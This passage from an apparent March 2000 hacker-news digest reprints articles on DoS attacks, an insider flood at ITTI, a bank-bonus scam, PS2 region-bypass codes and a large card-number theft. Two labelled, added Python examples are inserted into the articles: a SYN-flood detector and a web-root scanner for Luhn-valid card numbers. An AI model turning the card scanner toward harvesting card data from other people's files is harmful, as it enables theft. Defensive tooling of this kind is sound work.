      originating in foreign countries, particularly China and Bulgaria. 
      
      @HWA
      
31.0  HNN:Mar 16th:NASA Fears CyberAttack From Brazil 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      NASA's Jet Propulsion Laboratory has blocked all access
      to its web site from addresses originating in Brazil due to
      fears of a cyber attack. JPL spokespeople said that
      access would be restored once additional security
      measures were in place. (How does blocking one
      country affect anything?) 

      Newsbytes 
      http://www.newsbytes.com/pubNews/00/145708.html
      
      NASA Division Battles The Hack From Ipanema 

      By Robert MacMillan, Newsbytes 
      
      WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15 PM CST

      From Antonio Carlos Jobim to the samba, the US generally has welcomed some 
      of the cooler cultural exports from Brazil, but the latest one - a series 
      of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the       
      agency bossa nova-ing its way toward beefing up its security measures. 

      JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that 
      the agency has shut down access to queries emanating from Brazil until the 
      agency's security team makes some necessary improvements to its       
      network. 

      O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as 
      earlier reports indicated. 

      "There was a number of recent attacks on JPL hosts originating from 
      various sites in Brazil, and as a temporary move while our computer 
      security people work, we're blocking network access to JPL from Brazil," 
      O'Donnell said. "But this is a temporary thing." 

      He said normal service to South America's largest nation would return "in 
      a matter of days at most." 

      He added that he is "not aware of any (security) compromises per se in 
      these attacks." 

      Highly secure data at JPL generally is not stored on hosts that are 
      connected to the Internet, O'Donnell also said, but added that he could 
      "not go into a great deal of detail" on what kind of information was 
      sought. 

      MSNBC reported the Brazil problem after a network analyst at the Bank of 
      Brazil in Brasilia reported that he could not access the JPL site. 

      The service also reported that a CERT official at its headquarters in 
      Pittsburgh, Pa., said that blocking access to an entire network or country 
      is reasonably common, though the official said that in spoofing attacks - 
      when the address of the attacking e-mail in a denial of service 
      attack is falsified - blocking against a particular domain or country code 
      becomes largely ineffective. 

      O'Donnell said that CERT and the JPL have been working jointly on security 
      issues. 

      Reported by Newsbytes.com, http://www.newsbytes.com . 

      13:15 CST 
      
      @HWA
      


32.0  HNN:Mar 16th:FBI Site Hit by DOS Again 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by William Knowles 
      Just as the FBI was posting information about the 50th
      anniversary of its "Ten Most Wanted Fugitives" to its
      web site it was hit with a denial of service attack. The
      attack forced the web site offline for several hours. 

      UPI - via Virtual New York 
      http://www.vny.com/cf/News/upidetail.cfm?QID=71527
      
      FBI Web site attacked

      Wednesday, 15 March 2000 15:15 (ET)

      FBI Web site attacked

      By MICHAEL KIRKLAND

       WASHINGTON, March 15 (UPI) -- There has been another "denial of service"       
       cyber-attack against a high-profile Web site, sources told UPI Wednesday 
       -- this time the target was the FBI's own Web page, which was taken out 
       of action for several hours Tuesday.

       The attack hit just as the FBI was posting information about the 50th       
       anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated 
       Tuesday at the bureau with the opening of a permanent headquarters 
       exhibit.

       A "denial of service" attack overwhelms a Web site with requests for       
       information, but with "spoofed" -- fabricated -- return e-mail addresses. 
       A site tries to endlessly answer the requests, and in effect ties itself 
       in knots until it shuts down.

       There was no indication yet on whether Tuesday's cyber-attack was a 
       "distributed" denial of service attack, similar to those launched against 
       major commercial sites on the Internet early last month. Those attacks 
       temporarily crippled Yahoo!, E-Trade, CNN.com and others.

       U.S. investigators were still pursuing leads on the latest attack       
       Wednesday, defining its nature.

       A "distributed" attack is one which uses "innocent" third-party computer       
       systems.

       Illegal hackers, called "crackers," usually find the attack software       
       "tools" available "in the wild" on the Internet.

       The "distributed denial of service," or DDOS, tools enable a cracker to       
       break into an unsuspecting computer system and implant "packets" or 
       "daemons" that will cause the system to launch an attack against a target 
       unless detected and disabled in time. Literally hundreds of "zombie" 
       computer systems can be infected, without their operators' knowledge, and 
       can launch a simultaneous attack.

       The FBI is still searching for at least two unnamed suspects in 
       February's attacks. Much of the search has been concentrated in 
       Canada with the help of the Royal Canadian Mounted Police.

       Agents are also concentrating on Germany, where the DDOS "tools" may have       
       originated, though Germany is not believed to be the country of origin 
       for the actual attacks.

       There was no immediate indication Wednesday that the attack on the FBI 
       site came from the same suspects wanted for the attacks on the commercial 
       sites.

     
      -- Copyright 2000 by United Press International.
      All rights reserved.
      
      
      @HWA


33.0  HNN:Mar 16th:Teenager Arrested in Online Bank Scam 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Evil Wench 
      Someone has finally been arrested in a scam that has
      been circling around the Internet for months. Various
      online banks offer cash rewards just for opening an
      account. The scam works by opening several accounts
      under false names and then transferring the free money
      from each account into a real account. A 14 year old
      student at Thomas Jefferson Middle School in Jefferson
      City, Missouri, was able to amass over $2000. The scam
      was uncovered by a postal worker after he started
      delivering 'bushels' of mail to an address owned by the
      kid's father. (Discovered by a postal worker?) 

      APB News 
      http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html
      
      
      Teen Busted in Internet Banking Scam 
      
      120 Fake Accounts Yielded $2,000 in Rewards 

      March 15, 2000 

      By Carol Huang 

      JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri 
      signed up for more than 120 fake bank accounts through the Internet to 
      rake in a total of $2,000 in new customer cash rewards, authorities said 
      today. 

      "He didn't realize the gravity of what he was doing, but he knew it was 
      wrong and that it wasn't his money," said Cole County Sheriff John 
      Hemeyer. 

      Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had 
      been helping his father, a self-employed construction contractor, enter 
      business records onto a computer when he found an Internet site offering 
      an opportunity to open a bank account. 

      Eventually, the teen had more than 120 accounts at banks around the 
      country, each under a name generated by his computer, and had transferred 
      more than $2,000 in cash freebies into a real account of his own. 

      Puzzled postal worker 

      A puzzled postal worker reported delivering "bushels of baskets of mail" 
      to a vacant trailer on a plot of land, and investigating deputies went to 
      the boy's father, who owns the land. 

      Besides entering the teen into the juvenile court system, deputies 
      confiscated his computer, which he had upgraded using the cash rewards, 
      Hemeyer said. 

      "It's the only referral we've ever had on this kid. So if he quits, and 
      pays back some money, that will be about it," Hemeyer said. 

      Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com).
      
      
      @HWA


34.0  HNN:Mar 16th:Former Employee Arrested For Attack On Company 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    
      
      From HNN http://www.hackernews.com/


      contributed by no0ne 
      31 year old Abdelkader Smires, was charged in United
      States District Court in Brooklyn with computer-related
      fraud and remained in custody pending a bail hearing on
      Friday. Smires is being accused of causing his former
      company, Internet Trading Technologies, Inc. (ITTI)
      which provides software that allows market-makers to
      conduct online securities transactions, to shut down
      several times since last Thursday by directing
      coordinated attacks against the firm's computer
      networks. 

      NY Times
      http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html
      
      C|Net
      http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627
      
      Associated Press - via San Jose Mercury News 
      http://www.sjmercury.com/breaking/docs/073358.htm
      
      
      NYTimes: pay
      
      -=-
      
      C|Net
    
      ITTI employee arrested in hacker attack
      By Bloomberg News, March 15, 2000, 4:20 p.m. PT 

      An employee of Internet Trading Technologies, a provider of 
      trade-execution services for securities firms, was arrested yesterday and 
      charged with attacking ITTI computers and causing interruptions in its 
      services this week, the U.S. Attorney's Office in Brooklyn said. 

      The employee, Abdelkader Smires, a database programmer, launched a series 
      of data transmissions intended to cause the firm's computers to crash 
      after he became involved in a dispute with his employers, according to 
      U.S. Attorney Loretta Lynch. He was arraigned in federal court in 
      Brooklyn yesterday and ordered held without bail, Lynch said. 

      ITTI's software system allows securities firms to trade Nasdaq stocks 
      online, a representative for the company said. It is marketed by other 
      firms, such as Trimark Group, under their own brand names, she said. 

      The system links small broker-dealers with market-makers like 
      Knight/Trimark, Mayer & Schweitzer and others, a Knight/Trimark spokesman 
      said. Firms use it so they don't have to install and maintain direct 
      hardware and software connections to market-makers. 

      Smires' attacks caused "significant interruption of ITTI's trade execution 
      over the past three business days," Lynch said. "If the attacks had 
      continued to cause denial of service, the viability of ITTI would have 
      been threatened, resulting in major disruption of trading on the 
      Nasdaq," she added. 

      The U.S. Secret Service's Electronic Crimes Task Force, which is a 
      cooperative effort of 25 local, state and federal agencies and 45 private 
      companies, helped trace Smires' computer attacks, said Bob Weaver, a 
      Secret Service representative. 

      Conflict developed between Smires and his bosses when ITTI's chief 
      development officer, who had hired Smires and was his supervisor, resigned 
      March 6, according to an affidavit filed in the case by Secret Service 
      Agent Peter Cavicchia. The firm then hired systems consultants to help 
      fill the gap created by the departure, but Smires and another, 
      unidentified programmer refused to help train the newcomers on ITTI's 
      systems, according to the affidavit. 

      Smires and the other programmer then told the firm's executives that they 
      would quit unless they were given "more employment security, a greater 
      salary and a greater equity interest in the firm," Cavicchia said. ITTI 
      responded by offering them one-year employment contracts, raises and 
      stock options, he said. 

      Smires and the other programmer nevertheless decided to resign, according 
      to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock 
      options and more substantial salary increases," Cavicchia said. A 
      "tentative agreement" was reached March 8, Cavicchia said. 

      The next day, Smires and the other programmer backed out of the agreement, 
      demanded more favorable terms and said ITTI executives should call them 
      only if the firm agreed to the specific counter-offer, Cavicchia said. 
      ITTI didn't call. Later on March 9, the attacks on ITTI's system 
      began. 

      The attacks continued Friday, Monday and yesterday, according to the 
      affidavit, shutting down ITTI's computers for a total of about five hours. 
      "While one of the attacks was occurring, ITTI computers revealed the 
      Internet Protocol address of the attacking computer," enabling 
      employees to trace it to a building on the Queens College campus in 
      Flushing, New York, where Smires is an instructor, Cavicchia said. Secret 
      Service agents were told that the particular Queens College computer from 
      which the attack was launched was being used by Smires at the time, the 
      affidavit said. 

      After his arrest, Smires admitted that he was responsible for the March 13 
      and March 14 attacks, Cavicchia said. 

      Smires also waged some of his attacks from a Kinko's copy shop in 
      Manhattan, Lynch said. 

      Copyright 2000, Bloomberg L.P. All rights reserved. 
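      The affidavit quoted above says ITTI's computers "revealed the Internet
      Protocol address of the attacking computer" during one of the floods,
      and that the address was then traced to a building on a campus. The
      Python below is an added example, not code from the article, from ITTI
      or from any of the cited sources: it shows the two steps a responder
      usually automates for this kind of incident, counting SYNs per source
      address in a sliding time window over connection logs, and mapping a
      flagged address to a known netblock. The log line format, the
      addresses (RFC 5737 documentation ranges) and the netblock-to-owner
      table are all constructed for the example.

```python
"""Flag flooding sources in connection logs, then attribute each flagged
address to a netblock. Added example; log format, addresses and netblock
table are constructed for illustration, not taken from any real system."""
from collections import defaultdict, deque
from datetime import datetime
import ipaddress
import re

# Constructed firewall-style lines (the format is an assumption, not any
# product's real output). 192.0.2.17 sends 8 SYNs in 8 seconds,
# 203.0.113.9 sends 6 SYNs in 3 seconds, 198.51.100.77 is a normal client.
SAMPLE_LOG = """\
2000-03-09T14:02:00 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:01 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:02 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:03 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:04 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:04 SRC=198.51.100.77 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:05 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:05 SRC=198.51.100.77 DST=198.51.100.5 DPT=443 FLAGS=ACK
2000-03-09T14:02:06 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:02:07 SRC=192.0.2.17 DST=198.51.100.5 DPT=443 FLAGS=SYN
garbage line that the parser must skip rather than crash on
2000-03-09T14:03:00 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:00 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:01 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:01 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:02 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:02 SRC=203.0.113.9 DST=198.51.100.5 DPT=443 FLAGS=SYN
2000-03-09T14:03:30 SRC=198.51.100.77 DST=198.51.100.5 DPT=443 FLAGS=SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=\S+ DPT=(?P<dpt>\d+) FLAGS=(?P<flags>\S+)$")

# Constructed attribution table (hypothetical owners), netblock -> label.
NETBLOCKS = {
    ipaddress.ip_network("192.0.2.0/24"): "campus-building-A (constructed)",
    ipaddress.ip_network("203.0.113.0/24"): "copy-shop-public-lan (constructed)",
}


def parse(log_text):
    """Parse log lines into (timestamp, src, dport, flags); skip malformed ones."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append((datetime.fromisoformat(m["ts"]), m["src"],
                       int(m["dpt"]), m["flags"]))
    return events


def flood_sources(events, window_seconds=10, threshold=5):
    """Sliding window per source: flag a source once it sends more than
    `threshold` SYNs inside any `window_seconds` span. Returns the peak
    in-window count for each flagged source."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, src, _dpt, flags in sorted(events):
        if "SYN" not in flags:
            continue
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()          # drop SYNs that fell out of the window
        if len(q) > threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged


def attribute(addr):
    """Map an address to the netblock owner, or 'unknown'."""
    ip = ipaddress.ip_address(addr)
    for net, owner in NETBLOCKS.items():
        if ip in net:
            return owner
    return "unknown"


def report(log_text=SAMPLE_LOG):
    """Flagged source -> (peak SYNs in window, netblock owner)."""
    flagged = flood_sources(parse(log_text))
    return {src: (count, attribute(src)) for src, count in flagged.items()}


if __name__ == "__main__":
    for src, (count, owner) in report().items():
        print(f"{src}: {count} SYNs in window, owner={owner}")
```

      The window and threshold are deliberately small so the constructed
      sample trips them; on real logs they are tuned to the service's
      normal per-client connection rate, and the attribution table is
      whatever the responder can pull from routing data or WHOIS.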
      
      -=-
      
      Assoc.Press; 404

      
      @HWA
      


35.0  HNN:Mar 16th:PlayStation2 can Play US DVD 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by acopalyse 
      Some DVDs released for the North American region can
      be played on PlayStation2 consoles in England. Pressing
      buttons in a certain sequence while the PlayStation2
      boots up into DVD mode can sometimes allow Region 1
      DVDs to be played on the Region 2 device. (Wonder if
      this will have any effect on the DeCSS lawsuit?) 

      The Register UK
      http://www.theregister.co.uk/000315-000017.html
      
      Gaming Intelligence Agency 
      http://www.thegia.com/news/0003/n11a.html
      
      
      Register;
      
      
    
      Posted 15/03/2000 5:04pm by Linda Harrison
    
      PlayStation 2 can play US DVDs - apparently
    
      Gaming boffins claim to have found a way to play American DVDs on PlayStation 2
      consoles. 
    
      Three codes have surfaced which make it possible to play Region 1 (North America)
      DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player. 
    
      Like console video games, DVDs are usually fixed by vendors so they can only
      operate within specific world markets. It was previously believed the PlayStation 2,
      launched solely in Japan, could play only Region 2 DVDs. 
    
      But the Gaming Intelligence Agency's Web site this week claimed to have found the
      codes needed to overcome this inconvenience. These codes do not work every time
      -- a hitch believed to be linked to how hard the Dual Shock 2's buttons are pressed. 
    
      "All three codes should be entered when the PlayStation 2 DVD bootup sequence
      begins fading to black... If you get a region failed message, don't despair; just try
      again. The same disc will work some times and not others," it reports. 
    
      "While these codes certainly leave room for improvement, the advent of any region
      bypass is good news for system importers and DVD fans," thegia.com adds. 
    
      Sony Computer Entertainment in the UK chose not to comment. 
      
      -=-
      
      GIA;
      
      Play American DVDs on Japanese PlayStation 2

          [03.11.00] Simple controller codes make it possible.

       Two simple controller codes have recently surfaced that make it 
       possible to play Region 1 (North America) DVDs on the PlayStation 
       2, a Region 2 (Japan and Asia) DVD player. Much like console 
       videogames, DVDs are region encoded to dissuade consumers from 
       importing titles from outside of the country. It was previously 
       believed that the PlayStation 2 would only play Region 2 DVDs.

       These codes currently work only some of the time. We are unsure why 
       they do not work 100% of the time; we believe they may depend on how 
       hard the user presses the Dual Shock 2's analog buttons. If you own a 
       PS2 and Region 1 movies, the GIA is interested in hearing about your 
       experiences with the codes, especially if you find a way to make 
       Region 1 movies play more reliably. Please e-mail staff@thegia.com 
       with the movie tested, code used, and the tries / success ratio.

       All three codes should be entered when the PlayStation 2 DVD bootup 
       sequence begins fading to black. The buttons should be held until 
       either the DVD movie starts up (1 line of Japanese) or a "region 
       failed" message appears (2 lines of Japanese). If you get a region 
       failed message, don't despair; just try again. The same disc will 
       work some times and not others.

       The first code comes from the GIA's own J.T. Kauffman; it is 
       apparently circulating Japanese message boards and web sites. The 
       code is: hold down L1, Circle, and Select. This code has worked 
       with both the Dual Shock 1 and 2 with about 40% accuracy.

       The second code comes from a friend of the GIA known as Barubary. 
       The code is: press in L3 (the left analog stick) straight and hard. 
       This code does not work with the Dual Shock 1, but works with the 
       Dual Shock 2 with about 60% accuracy.

       The newest, third code comes from GIA friend Nick "Rox" Des Barres. 
       Nick reports that this code works an astounding 95% of the time. 
       The instructions follow:

          1. Insert a first-generation PlayStation pad (i.e., not an analog 
             controller) in Control Port 1 of the PS2. 
          2. Insert the DVD. 
          3. Hold UP on the pad until the DVD menu appears. 
          4. Highlight the play icon and select it. 

       Nick adds, "I tried this on 20 or so DVDs, and it booted all of 
       them. Two or three would not play. You could access the menus, 
       however. It should be noted I was using a Japanese first-generation 
       PS1 pad, though I can't imagine why it wouldn't work with American 
       ones."

       While these codes certainly leave room for improvement, the advent 
       of any region bypass is good news for system importers and DVD 
       fans. The GIA will keep you posted on any new developments on the 
       PS2 DVD front.

      
      
      @HWA


36.0  HNN:Mar 16th:ISTF Releases Security Recommendations 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Chris 
      The Internet Security Task Force, a conglomeration of
      big-name tech companies, ISPs and other e-business
      firms, has produced a "vendor neutral set of
      recommendations in understandable language" about the
      problems and solutions in internet security. The paper
      doesn't say anything new, but because it was released
      by "credible" vendors and not "the evil underground"
      some suits might finally pay attention. But then again,
      maybe not. 

      Initial Recommendations For Conducting Secure eBusiness       
      http://www.ca.com/ISTF/recommendations.htm
      
      @HWA
      
37.0  HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      A file containing credit card numbers, expiration dates,
      names and addresses was found last year on a US
      government website. The thief has been traced back to
      a European country but it has not been revealed which
      one. It has also not been revealed which online service
      the numbers came from or which government agency
      was unwittingly storing the numbers. The incident has
      been confirmed by the Secret Service but first came to
      light when a bank employee notified reporters. The bank
      received notice of the credit card heist from Visa
      but failed to notify its card holders. 

      MSNBC       
      http://www.msnbc.com/news/382561.asp
      
      Vast online credit card theft revealed 

      Hacker hid data on 485,000 cards on U.S. agency's Web site 
      By Mike Brunker 
      MSNBC
               
      March 17 - In the largest known case of
      cybertheft, a computer intruder stole information
      on more than 485,000 credit cards from an
      e-commerce site and then secretly stored the
      massive database on a U.S. government agency's
      Web site, MSNBC.com has learned. Credit card
      companies notified financial institutions, but
      many of the compromised accounts remain open
      to this day because the banks neither closed
      them nor notified customers of the theft.
      
            THE HEIST occurred in January 1999, but only a few
     details have previously been made public.
            The scope of the crime emerged in a letter dated Dec.
     27 from Visa USA to member financial institutions. Jim
     Macken, a Secret Service spokesman, confirmed that the
     incident had occurred and added some details in an
     interview on Thursday.
            

            The Visa letter, a copy of which was provided to
     MSNBC by a source in the banking industry, quotes federal
     authorities as saying that the credit card information,
     including expiration dates and cardholder names and
     addresses, was stolen from an Internet retail site by a
     hacker. 
             
            It said the store of data on Visa, MasterCard, American
     Express and Discover cards was discovered on an unspecified
     government computer system during an audit. The letter did not
     say when the stolen data was found, but Macken said it was
     discovered before March 1999 on the Web site of a U.S.
     government agency, which he declined to identify.
            "This government Web administrator noticed that a lot
     of the memory was chewed up for no reason, so he
     checked and found the file (containing the stolen data)," he
     said.
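            The dump was found because an administrator noticed space
     being consumed for no reason and went looking. The Python below is
     an added example, not code from MSNBC, the Secret Service or any
     product named in this article: it does what that audit did by hand,
     walking a web root, pulling out digit runs that pass the Luhn
     mod-10 check every payment card number satisfies, and reporting
     files that hold several distinct valid numbers, which is what a
     parked dump looks like as opposed to a single test value in a log.
     The directory layout, file contents and issuer-prefix table are
     constructed for the example; the card numbers are the public test
     values issuers publish, not real accounts.

```python
"""Sweep a web root for parked card-data dumps: find Luhn-valid card
numbers and report files holding many of them. Added example with a
constructed sample tree; not from the original article."""
import os
import re
import tempfile

# Runs of 13-19 digits, optionally broken by single spaces or dashes,
# not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Abbreviated issuer prefixes (well-known public ranges; not exhaustive).
BRANDS = [
    ("Visa", re.compile(r"^4")),
    ("MasterCard", re.compile(r"^5[1-5]")),
    ("American Express", re.compile(r"^3[47]")),
    ("Discover", re.compile(r"^6011")),
]


def luhn_ok(digits):
    """Mod-10 check digit test used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                     # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def brand(digits):
    for name, pat in BRANDS:
        if pat.match(digits):
            return name
    return "unknown"


def mask(digits):
    """Keep BIN and last four so a report never re-creates the dump."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(text):
    """(masked number, brand) for each Luhn-valid number in `text`.
    Luhn rejects most random digit runs (order numbers, timestamps)."""
    hits = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append((mask(digits), brand(digits)))
    return hits


def scan_tree(root, min_hits=3):
    """Walk `root`; return {relative path: (distinct valid numbers, bytes)}
    for files holding at least `min_hits` distinct valid numbers."""
    dumps = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue                   # unreadable file: skip, keep sweeping
            distinct = {masked for masked, _ in find_pans(text)}
            if len(distinct) >= min_hits:
                dumps[os.path.relpath(path, root)] = (len(distinct),
                                                      os.path.getsize(path))
    return dumps


def build_sample_tree():
    """Constructed web root: one page, one log with a single test card,
    and one parked dump. Card numbers are issuers' public test values."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "index.html": "<html>order 1234567890123456 shipped</html>\n",
        "access.log": "2000-01-12 POST /checkout card=4111-1111-1111-1111 ok\n",
        "cache/.tmp.dat": "\n".join([
            "Alice,4111 1111 1111 1111,01/02",
            "Bob,5500000000000004,03/01",
            "Carol,378282246310005,11/00",
            "Dave,6011111111111117,05/01",
            "Eve,4111111111111112,09/01",   # fails Luhn: typo or decoy
        ]) + "\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, (count, size) in scan_tree(build_sample_tree()).items():
        print(f"{path}: {count} distinct card numbers, {size} bytes")
```

     The order number in index.html and the mistyped entry in the dump
     both fail the Luhn check, so only four numbers count, and the single
     real value in access.log stays below the dump threshold; the size
     comes along in the report because an unexplained large file is the
     signal the administrator in this story actually noticed.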
            
     NO EVIDENCE OF FRAUDULENT USE 
            There was no evidence that any of the cards were used
     to commit fraud and some of the accounts were not active,
     Macken added.
            The letter said that authorities had not identified the
     thief, but Macken said investigators have since traced the
     criminal to Eastern Europe. The investigation is ongoing and
     involves diplomatic contacts with the country in question, he
     said.
            The Internet retail site from which the data was stolen
     has also since been identified, but Macken declined to name
     it. 

            It was unclear why the thief hacked the government Web site
     and stored the data there, Macken said, though he allowed that the
     act might have been the online equivalent of thumbing one's nose at
     U.S. authorities.
            As MSNBC reported last week, U.S. authorities have
     so far been stymied in their attempts to prosecute credit
     card thieves and fraud rings based in the former Soviet bloc
     nations and Asia.
            


            Secret Service officials testified about some details of
     the case before Congress early last year to demonstrate the
     peril that computer hackers pose to online commerce,
     Macken said. Their comments generated little coverage,
     however, and the scope of the case is only now becoming
     clear.
            
     EFFORT TO HIGHLIGHT INACTION 

            The copy of the letter from Visa was obtained by
     MSNBC from an employee at the Navy Federal Credit
     Union, in Merrifield, Va., the world's largest credit union
     with 19 million members. The letter was provided, the
     source said, to highlight the fact that some financial
     institutions are failing to act to protect consumers when
     there is evidence that their credit card information has been
     stolen.
            Officials at the credit union took no action to warn
     customers whose account numbers were among those
     stolen by the hacker, said the source, who spoke on
     condition of anonymity. Instead, they ordered a "spot
     check" of 50 to 100 accounts and then decided that no
     further action was necessary, the source said.
            The source said the same procedure was followed two
     weeks later, when Visa alerted the institution of the theft of
     data on 300,000 credit cards from the CD Universe Web
     site � the biggest theft of credit card data over the Internet
     that previously had been made public.
            "It was decided that ... it would be too much of an
     inconvenience and too costly to shut down the accounts and
     issue new numbers," said the source. "It was deemed not
     the credit union's responsibility." 
            The credit union source said that fraudulent charges
     have subsequently appeared on some of the accounts that
     were compromised, though it is impossible to definitively
     link the fraud to the theft.
            
     CREDIT UNION RESPONDS         

            In a statement issued Friday in response to
     MSNBC.com's story, Navy Federal Credit Union officials
     did not challenge the assertion that they did not warn
     customers of the theft. But they denied that cost or
     inconvenience were factors in the decision. 
            "When we received notification of this problem from
     VISA USA, we reviewed our systems and were confident
     that all appropriate controls were in place to protect our
     members' financial welfare," said Tom Steele, a credit union
     vice president in charge of the credit card division.
     "Additional checks of the 1,500 Navy Federal credit card
     accounts identified by VISA USA confirmed that the steps
     we had taken safeguarded every cardholder; we have
     also not seen any increase in fraud losses."
            The statement also indicated that no Navy Federal
     cardholders have been victims of identity theft as a result of
     the heist.
            Calls to American Express and a half dozen major
     banks seeking information on their response when notified
     of the theft were not returned.
            Scott Lynch, a spokesman for Visa USA, said he
     could not comment on the case. Nor would he explain why
     Visa didn't notify its members of the theft until December.
            Alicia Zatkowski, a spokeswoman for Discover
     Financial Services, said the firm's fraud investigators were
     not aware of such a case.
            Vincent DeLuca, vice president of fraud control at
     MasterCard International, said, "We are aware of some
     cases but we're not at liberty to talk about any ongoing
     investigations."

            Several financial institutions ordered the wholesale
     closure and replacement of cards that were compromised in
     the CD Universe case, which also remains under
     investigation. Such across-the-board replacement programs
     were well publicized in an effort to assure online consumers.
            
            Banks and credit card companies often point out that
     consumers are responsible only for the first $50 of
     fraudulent online purchases, and that is nearly always
     waived. 

            But stolen credit card information can be used to
     commit fraud against unsuspecting Internet merchants, who
     in most cases bear the cost of the crime, or for identity theft,
     a practice in which criminals use personal data to obtain
     new credit, borrow money or make big-ticket purchases.
            The Treasury Department on Wednesday held a
     two-day national summit on identity theft to focus attention
     on what Treasury Secretary Lawrence Summers described
     as "a growing and major criminal threat." 
            At the session, victims said that while they did not
     ultimately have to pay for the losses run up in their names,
     identity theft is by no means a victimless crime.
            "It has been sheer hell, and I do mean hell," said
     Darlene Zele, a Rhode Island hospital worker and one of
     the victims who testified about years of struggling to repair
     the havoc wrought on their credit records. "At this point,
     after five years, it's still not over."
            
            Got a tip about the use or abuse of credit cards online?
     Write to tipoff@msnbc.com.
     
     @HWA
     
38.0  HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by webmaster 
      A group called DDoS-BR is spreading denial of service
      attacks against Brazilian government networks. The
      Brazilian Supreme Court and the National
      Telecommunications Agency web sites have been
      shut down for most of the week due to the attacks. The
      Brazilian authorities are looking forward to legislation
      that will soon be approved which might give the federal
      police enough power to investigate and arrest electronic
      criminals. (Hopefully they have the knowledge to use
      that power wisely.) 

      SecureNet - in Portuguese
      http://www.securenet.com.br/cgi-bin/news?id=15030003
      
      @HWA
      
39.0  HNN:Mar 17th:Secret Service Harassing Bernie S Again 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by macki 
      Five years to the day after Bernie S. was arrested at
      gunpoint and subjected to nearly 17 months of
      imprisonment by the United States Secret Service,
      agents of the USSS have again begun some kind of cat
      and mouse game, the nature of which has yet to be
      revealed. 

      2600 
      http://www.2600.com/news/2000/0317.html
      
      SECRET SERVICE HARASSING BERNIE S AGAIN 

      03/17/00 

      Five years to the day after Bernie S. was arrested at gunpoint and 
